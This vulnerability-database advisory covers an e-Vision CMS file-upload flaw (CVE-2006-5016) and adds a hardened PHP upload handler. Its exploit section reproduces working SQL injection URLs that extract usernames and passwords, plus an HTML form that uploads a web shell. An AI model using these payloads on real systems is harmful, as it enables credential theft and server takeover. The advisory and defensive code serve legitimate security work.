Szava Gyula and Csaba Tamas e-Vision CMS 'admin/x_image.php' Unrestricted File Upload Vulnerability

Vulnerability ID: 1115829    Vulnerability type: Input validation
Published: 2008-08-02    Updated: 2008-08-02
CVE ID: CVE-2006-5016    CNNVD ID: CNNVD-200609-478
Platform: PHP    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/6191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-478
|Vulnerability details
Unrestricted file upload vulnerability in admin/x_image.php in Szava Gyula and Csaba Tamas e-Vision CMS, possibly version 1.0, allows remote attackers to upload arbitrary files to the /imagebank directory.
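The description above names the two missing controls that make this class of bug exploitable: the upload handler does not restrict what is uploaded, and it writes the result into a web-served directory. The following is an added example of a hardened image upload handler, written for this page and not code from e-Vision CMS; it shows the checks an endpoint like admin/x_image.php needs. The function names, the `is_admin` session key and the storage path are assumptions.

```php
<?php
// Added example, not part of e-Vision CMS: a hardened image upload handler.
// Function names, the session key and the storage path are assumptions.
declare(strict_types=1);

// Assumed: admin endpoints must require an authenticated admin session.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('forbidden');
    }
}

// Allowlist: permitted extension => MIME type the file content must actually have.
const ALLOWED_IMAGES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Returns the validated extension, or throws on any failed check.
function validate_image_upload(array $file, int $maxBytes = 2 * 1024 * 1024): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('file too large');
    }
    // Only accept a file PHP itself received via HTTP POST; this rejects any
    // attempt to point the handler at a local path or URL instead of an upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // The client-supplied name is used only to pick an extension, never to build a path.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Check the real content type; $file['type'] is attacker-controlled and must be ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Require the data to decode as an image. Polyglot files can still pass this,
    // so the storage directory must also be non-executable (see usage note).
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    return $ext;
}

// Stores the upload under a random server-chosen name and returns that name.
function store_image(array $file, string $storageDir): string
{
    $ext  = validate_image_upload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storageDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

require_admin();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file_upload'])) {
    try {
        // Assumed path outside the document root; files are served back by a
        // separate read-only script rather than directly by the web server.
        $stored = store_image($_FILES['file_upload'], '/var/www/evision-storage/imagebank');
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Two points in this design matter independently of the allowlist: the stored name is generated server-side, so an attacker never controls the filename or its extension, and the storage directory sits outside the web root. If the directory must remain web-reachable for compatibility, the web server configuration should additionally refuse to execute scripts there (for Apache, `php_flag engine off` or removing the PHP handler for that directory; for nginx, a location block that never passes the directory to PHP-FPM), so that a file which slips past validation is served as data rather than run.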
|Vulnerability EXP
#####################################################################################
####              eVision 2.0 Sql Injection/Remote File Upload/IG                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#                                                                                   #
#DORK :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                [Sql Injection]                                    #
#                                                                                   #
#Blind : http://Site/print.php?id=1'+and+1=1/*                                      #
#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=username&module=users/*                        #
#Pass : http://Site/iframe.php?field=pass&module=users/*                            #
#                                     [IG]                                          #
#http://Site/admin/phpinfo.php                                                      #
#                                                                                   #
#                               [Remote File Upload]                                #
#Exploit :                                                                          #
#                                                                                   #
#<html>                                                                             #
#<!--                                                                               #
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))                                   # 
#Http://IrCrash.Com                                                                 #
#//-->                                                                              #
#<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data>
#<input type=file name='file_upload'>                                               #
#<input type=hidden name=insert value=1>                                            #
#<input type=hidden name=s_rc value='file://'>                                      #
#<input type=submit>                                                                #
#</form>                                                                            #
#</html>                                                                            #
#Your shell save in http://Site/imagebank/                                          #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-02]
|References

Source: BID
Name: 21047
Link: http://www.securityfocus.com/bid/21047
Source: BUGTRAQ
Name: 20060922 E-Vision CMS Multible Remote injections
Link: http://www.securityfocus.com/archive/1/archive/1/446706/100/0/threaded
Source: XF
Name: evisioncms-ximage-file-upload(29124)
Link: http://xforce.iss.net/xforce/xfdb/29124
Source: VUPEN
Name: ADV-2006-3764
Link: http://www.frsirt.com/english/advisories/2006/3764
Source: SREASON
Name: 1642
Link: http://securityreason.com/securityalert/1642
Source: SECUNIA
Name: 21969
Link: http://secunia.com/advisories/21969